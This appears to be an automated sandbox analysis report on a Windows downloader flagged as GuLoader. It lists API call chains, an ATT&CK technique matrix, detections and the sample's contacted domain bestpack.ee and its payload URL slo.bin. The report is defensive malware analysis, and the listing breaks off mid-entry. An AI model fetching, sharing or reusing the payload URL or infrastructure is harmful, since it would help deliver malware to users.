      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74509198454.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74395501664.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144773492.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714567079.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75192333805.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372413154.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74737216556.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75532927856.00000000066BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeAPI call chain: ExitProcess graph end nodegraph_0-4915
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeAPI call chain: ExitProcess graph end nodegraph_0-4913
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeCode function: 0_2_00401774 lstrcatW,CompareFileTime,LdrInitializeThunk,SetFileTime,CloseHandle,lstrcatW,0_2_00401774
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeCode function: 0_2_70591BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70591BFF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"Jump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API      		1
      DLL Side-Loading      		1
      Access Token Manipulation      		1
      Masquerading      		OS Credential Dumping11
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
      Process Injection      		1
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Clipboard Data      		3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading      		1
      Access Token Manipulation      		Security Account Manager2
      File and Directory Discovery      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Process Injection      		NTDS13
      System Information Discovery      		Distributed Component Object ModelInput Capture14
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe50%ReversingLabsWin32.Trojan.GuLoader

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      bestpack.ee
      		185.86.211.137
      		truefalse
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://bestpack.ee/slo.binfalse
          		unknown
          http://bestpack.ee/slo.binfalse
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://bestpack.ee/slo.binWSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75532844773.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              http://bestpack.ee/slo.binWSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305885412.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74737118310.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72118854525.00000000066CD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73486212959.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372304970.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916087709.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                https://bestpack.ee/slo.binYRSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74964852204.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  https://bestpack.ee/tpack.ee/-end-point:SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74395501664.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144571670.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258455659.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916629062.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714567079.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73030912520.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73600667395.00000000066B2000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    https://bestpack.ee/slo.binRSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75532844773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419392263.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305885412.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000002.76733975773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75192249873.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://bestpack.ee/slo.bin8RSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72801998690.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72118854525.00000000066CD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72286211285.00000000066D1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000002.76733975773.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://bestpack.ee/-end-point:SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74395501664.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144571670.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000002.76733975773.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72688325234.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258455659.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372579596.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74509198454.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916629062.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714567079.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72574360519.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73030912520.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305963490.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73600667395.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75078811291.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74851095828.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73486344040.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419467345.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74623047904.00000000066B2000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://bestpack.ee/slo.binYRSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305885412.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74737118310.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75192249873.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://bestpack.ee/slo.bin2RSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75532844773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419392263.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://bestpack.ee/slo.binRSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144493078.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714163433.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74737118310.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72801998690.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73486212959.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372304970.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74509067339.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74964852204.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72286211285.00000000066D1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73030411499.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916087709.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72687881385.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74622911186.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258321058.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://bestpack.ee/slo.binustSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75532927856.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419467345.00000000066BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://bestpack.ee/slo.binGSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419392263.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305885412.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72118854525.00000000066CD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72286211285.00000000066D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://bestpack.ee/slo.binGSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916087709.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://bestpack.ee/slo.binmRSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144493078.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419392263.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714163433.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73486212959.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000002.76733975773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75192249873.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://nsis.sf.net/NSIS_ErrorErrorSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000000.00000000.71623708862.000000000040A000.00000008.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
                                          		unknown
                                          http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000001.71909063728.0000000000626000.00000020.00000001.01000000.00000005.sdmpfalse
                                            		unknown
                                            https://bestpack.ee/slo.binBSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75532844773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144493078.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419392263.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305885412.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714163433.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74737118310.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73486212959.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372304970.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74509067339.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74964852204.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73030411499.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000002.76733975773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916087709.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72687881385.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75192249873.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74622911186.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258321058.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://www.gopher.ftp://ftp.SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000001.71909063728.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                		unknown
                                                https://bestpack.ee/slo.binmRSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75532844773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305885412.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372304970.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://bestpack.ee/slo.bin4BSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75532844773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144493078.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419392263.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305885412.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714163433.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74737118310.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72118854525.00000000066CD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73486212959.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372304970.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74509067339.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74964852204.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72286211285.00000000066D1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73030411499.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000002.76733975773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916087709.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75192249873.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74622911186.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258321058.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://bestpack.ee/oISecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714163433.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74509067339.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258321058.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://bestpack.ee/slo.binBSecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75532844773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144493078.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419392263.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305885412.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714163433.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72801998690.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73486212959.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372304970.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73030411499.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000002.76733975773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916087709.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72687881385.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75192249873.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258321058.00000000066D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://bestpack.ee/5SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74395501664.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144571670.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000002.76733975773.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72688325234.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258455659.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372579596.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74509198454.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72232647774.00000000066B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916629062.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714567079.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72574360519.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73030912520.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305963490.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73600667395.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75078811291.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74851095828.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73486344040.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 